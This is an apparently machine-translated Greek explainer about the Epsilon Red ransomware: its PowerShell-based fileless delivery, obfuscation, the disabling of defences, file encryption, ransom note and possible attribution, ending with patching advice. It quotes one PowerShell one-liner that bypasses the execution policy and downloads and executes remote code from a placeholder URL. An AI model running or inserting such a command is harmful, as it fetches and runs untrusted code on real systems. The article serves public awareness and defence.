Έχετε επιδιορθώσει πρόσφατα σφάλματα ασφαλείας στους διακομιστές σας;
Στοχεύει σε μια νέα απειλή ransomware, γνωστή ως Epsilon Red Μη επιδιορθωμένοι διακομιστές της Microsoft σε εταιρικά κέντρα δεδομένων. Πήρε το όνομά του από τον ελάχιστα γνωστό κακοποιό των κόμικ της Marvel, ο Epsilon Red ήταν ένας σχετικά μυστηριώδης ανταγωνιστής ορισμένων από τους X-Men στο διευρυμένο σύμπαν της Marvel, ένας «σούπερ στρατιώτης» που φέρεται να είναι ρωσικής καταγωγής, ο οποίος έχει τέσσερα μηχανικά νύχια και κακή συμπεριφορά.
Το Epsilon Red ανακαλύφθηκε πρόσφατα από μια εταιρεία κυβερνοασφάλειας γνωστή ως Sophos. Από την ανακάλυψή του, το ransomware έχει επιτεθεί σε πολλούς οργανισμούς σε όλο τον κόσμο.
Γρήγοροι σύνδεσμοι
Τι είναι το Epsilon Red;
σύμφωνα με Sophos Αυτό το κακόβουλο λογισμικό χρησιμοποιεί έναν συνδυασμό προγραμματισμού Go και δέσμης ενεργειών PowerShell για να επηρεάσει τον στόχο του. Οι δυνατότητες δέσμης ενεργειών PowerShell του Epsilon Red δίνουν τη δυνατότητα να χακάρετε διακομιστές που βασίζονται στη Microsoft. Το PowerShell από τη Microsoft είναι μια γραμμή εντολών και μια πλατφόρμα δέσμης ενεργειών χτισμένη στο .NET Framework.
Το PowerShell παρέχει δυνατότητες όπως δυνατότητα απομακρυσμένης εκτέλεσης εντολών, πρόσβαση σε βασικά API της Microsoft κ.λπ. Όλες αυτές οι δυνατότητες καθιστούν το PowerShell χρήσιμο για διαχειριστές συστήματος και χρήστες για την αυτοματοποίηση εργασιών και διαδικασιών διαχείρισης λειτουργικού συστήματος.
Ωστόσο, το PowerShell μπορεί επίσης να χρησιμοποιηθεί ως μια ισχυρή επιλογή δημιουργίας κακόβουλου λογισμικού. Η ικανότητα των σεναρίων να έχουν πρόσβαση στα εργαλεία Microsoft Windows Management Instrumentation (WMI) τα καθιστά ελκυστική επιλογή για τους εισβολείς. Η διεπαφή των οργάνων διαχείρισης των Windows επιτρέπει στα σενάρια PowerShell να αναγνωρίζονται ως εγγενώς αξιόπιστα για το σύστημα της Microsoft. Αυτή η εγγενής εμπιστοσύνη επιτρέπει στα σενάρια PowerShell να χρησιμοποιούνται ως αποτελεσματικό κάλυμμα για την απόκρυψη ransomware χωρίς αρχεία.
Παράδοση ransomware χωρίς αρχεία χρησιμοποιώντας το PowerShell
Το ransomware χωρίς αρχεία είναι μια μορφή κακόβουλου λογισμικού που εκτελείται με τη λήψη τους ως νόμιμες εφαρμογές. Το κακόβουλο λογισμικό χωρίς αρχεία, βασισμένο σε σενάρια χρησιμοποιεί την ικανότητα του PowerShell να φορτώνει απευθείας στη μνήμη της συσκευής. Αυτή η δυνατότητα βοηθά στην προστασία του κακόβουλου λογισμικού από τον εντοπισμό.
Σε ένα τυπικό σενάριο, κατά την εκτέλεση ενός σεναρίου, πρέπει πρώτα να εγγραφεί στο δίσκο της συσκευής. Αυτό επιτρέπει στις ομάδες ασφαλείας τελικού σημείου να το ανακαλύψουν. Επειδή το PowerShell εξαιρείται από τυπικές εκτελέσεις και ελέγχους σεναρίων, μπορεί να παρακάμψει την ασφάλεια τελικού σημείου. Επιπλέον, η χρήση της παραμέτρου παράκαμψης στα σενάρια PowerShell επιτρέπει στους εισβολείς να καταστρέψουν τους περιορισμούς δέσμης ενεργειών δικτύου.
Ένα παράδειγμα μιας παραμέτρου παράκαμψης PowerShell είναι:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))
Όπως μπορείτε να δείτε, είναι σχετικά εύκολο να μοντελοποιήσετε παραμέτρους που υπερισχύουν του PowerShell.
Σε απάντηση, η Microsoft κυκλοφόρησε μια ενημέρωση κώδικα για την αντιμετώπιση μιας ευπάθειας απομακρυσμένης εκτέλεσης κακόβουλου λογισμικού που σχετίζεται με το PowerShell. Ωστόσο, τα έμπλαστρα είναι αποτελεσματικά μόνο όταν χρησιμοποιούνται. Πολλοί οργανισμοί έχουν χαλαρά πρότυπα ενημέρωσης κώδικα που αφήνουν το περιβάλλον τους εκτεθειμένο. Το Epsilon Red έχει σχεδιαστεί για να εκμεταλλεύεται την κακή χρήση των ενημερώσεων κώδικα ασφαλείας.
Το διπλό όφελος του Epsilon Red
Δεδομένου ότι το Epsilon Red είναι πιο αποτελεσματικό με μη επιδιορθωμένους διακομιστές της Microsoft, το κακόβουλο λογισμικό μπορεί να χρησιμοποιηθεί τόσο ως ransomware όσο και ως αναγνωριστικό. Το αν το Epsilon πετύχει ή όχι σε ένα περιβάλλον θα δώσει στον εισβολέα μια βαθύτερη εικόνα των δυνατοτήτων ασφαλείας του στόχου.
Εάν το Epsilon αποκτήσει πρόσβαση σε διακομιστή Microsoft Exchange Server, ένας οργανισμός έχει δείξει ότι δεν συμμορφώνεται με τις κοινές βέλτιστες πρακτικές ενημερώσεων κώδικα ασφαλείας. Για έναν εισβολέα, αυτό μπορεί να υποδεικνύει πόσο εύκολα το Epsilon μπορεί να διεισδύσει στο υπόλοιπο περιβάλλον του στόχου.
Το Epsilon Red χρησιμοποιεί τεχνικές συσκότισης για να συγκαλύψει το ωφέλιμο φορτίο του. Η συσκότιση καθιστά τον κώδικα μη αναγνώσιμο και χρησιμοποιείται σε κακόβουλο λογισμικό PowerShell για να αποφευχθεί η υψηλή αναγνωσιμότητα των σεναρίων PowerShell. Με τη συσκότιση, τα cmdlet με το ψευδώνυμο PowerShell χρησιμοποιούνται για να δυσκολεύουν τις εφαρμογές προστασίας από ιούς να αναγνωρίζουν κακόβουλα σενάρια στα αρχεία καταγραφής του PowerShell.
Ωστόσο, τα αδιαφανή σενάρια PowerShell είναι αναγνωρίσιμα με το δεξί μάτι. Ένα κοινό σημάδι μιας επικείμενης επίθεσης PowerShell Script είναι η δημιουργία αντικειμένων WebClient. Ο εισβολέας θα δημιουργούσε ένα αντικείμενο WebClient στον κώδικα PowerShell για να δημιουργήσει μια εξωτερική σύνδεση σε μια απομακρυσμένη διεύθυνση URL που περιέχει κακόβουλο κώδικα.
Εάν ένας οργανισμός μπορεί να παραβιαστεί λόγω μιας χαλαρής ενημερωμένης έκδοσης κώδικα ασφαλείας, οι πιθανότητές του να αποκτήσει επαρκή προστασία ασφαλείας ικανή να ανιχνεύσει ασαφή σενάρια PowerShell θα μειωθούν. Αντίθετα, εάν το Epsilon Red αποτύχει να διεισδύσει σε έναν διακομιστή, αυτό λέει στον εισβολέα ότι το δίκτυο-στόχος μπορεί να είναι σε θέση να αποκρυπτογραφήσει γρήγορα το κακόβουλο λογισμικό PowerShell, καθιστώντας την επίθεση λιγότερο πολύτιμη.
Εισβολή δικτύου Epsilon Red
Η λειτουργία του Epsilon Red είναι απλή. Το οποίο χρησιμοποιεί μια σειρά από σενάρια Powershell για να χακάρει διακομιστές. Αυτά τα σενάρια PowerShell αριθμούνται από 1.ps1 έως 12.ps1 (συν μερικά ονομάζονται με ένα μόνο γράμμα του αλφαβήτου). Ο σχεδιασμός κάθε σεναρίου PowerShell είναι να ρυθμίσει έναν διακομιστή-στόχο για το τελικό ωφέλιμο φορτίο.
Όλα τα σενάρια PowerShell στο Epsilon Red έχουν έναν μόνο σκοπό. Ένα σενάριο PowerShell στο Epsilon Red έχει σχεδιαστεί για την επίλυση κανόνων του τείχους προστασίας δικτύου προορισμού. Μια άλλη στη σειρά έχει σχεδιαστεί για την απεγκατάσταση της εφαρμογής προστασίας από ιούς προορισμού.
Όπως μπορείτε να φανταστείτε, αυτά τα σενάρια λειτουργούν από κοινού για να διασφαλίσουν ότι όταν παραδοθεί το ωφέλιμο φορτίο, ο στόχος δεν θα μπορεί να σταματήσει γρήγορα την πρόοδό του.
παράδοση φορτίου
Αφού τα σενάρια PowerShell του Epsilon ανοίγουν τον δρόμο για την τελική του καμπάνια, παραδίδεται ως επέκταση, το Red.exe. Μόλις διεισδύσει στον διακομιστή, το Red.exe σαρώνει τα αρχεία του διακομιστή και δημιουργεί μια λίστα με διαδρομές καταλόγου για κάθε αρχείο που εντοπίζει. Μετά τη δημιουργία της λίστας, δημιουργούνται υποδιεργασίες από το γονικό αρχείο κακόβουλου λογισμικού για κάθε διαδρομή καταλόγου στη λίστα. Στη συνέχεια, κάθε αρχείο ransomware κρυπτογραφεί μια διαδρομή καταλόγου από το αρχείο λίστας.
Μόλις κρυπτογραφηθούν όλες οι διαδρομές καταλόγου στη λίστα του Epsilon, το αρχείο .txt αφήνεται για να ενημερώσει τον στόχο για το τι έχει εκτεθεί και να αναγνωρίσει τα αιτήματα του εισβολέα. Επιπλέον, όλοι οι προσβάσιμοι κόμβοι δικτύου που είναι συνδεδεμένοι στον παραβιασμένο διακομιστή στη συνέχεια παραβιάζονται και η πρόσβαση κακόβουλου λογισμικού μπορεί να προχωρήσει στο δίκτυο.
Ποιος βρίσκεται πίσω από το Epsilon Red;
Η ταυτότητα των δραστών που χρησιμοποιούσαν το Epsilon Red είναι ακόμη άγνωστη. Αλλά κάποιες ενδείξεις υπονοούν την προέλευση των επιτιθέμενων. Η πρώτη ένδειξη είναι το όνομα του κακόβουλου λογισμικού. Epsilon Red Είναι ένας κακός των X-Men με ιστορία ρωσικής καταγωγής.
Το δεύτερο στοιχείο βρίσκεται στη σημείωση λύτρων του αρχείου .txt που έχει απομείνει. Είναι παρόμοιο με το σημείωμα που άφησε η συμμορία ransomware που είναι γνωστή ως REvil. Ωστόσο, αυτή η ομοιότητα δεν δείχνει ότι οι δράστες είναι μέλη της συμμορίας. Το REvil εκτελεί τη διαδικασία RaaS (Ransomware ως υπηρεσία) όπου οι συνεργάτες της REvil πληρώνουν για να αποκτήσουν πρόσβαση στο κακόβουλο λογισμικό τους.
Πρέπει να προστατεύσετε τον εαυτό σας από το Epsilon Red
Μέχρι στιγμής, το Epsilon Red έχει χακάρει επιτυχώς μη επιδιορθωμένους διακομιστές. Αυτό σημαίνει ότι μία από τις καλύτερες άμυνες έναντι του Epsilon Red και του κακόβουλου λογισμικού που μοιάζει με ransomware είναι να διασφαλίσετε ότι το περιβάλλον σας τυγχάνει σωστής διαχείρισης. Επιπλέον, μια λύση ασφαλείας που μπορεί γρήγορα να αποκρυπτογραφήσει τα σενάρια PowerShell θα ήταν μια χρήσιμη προσθήκη στο περιβάλλον σας.
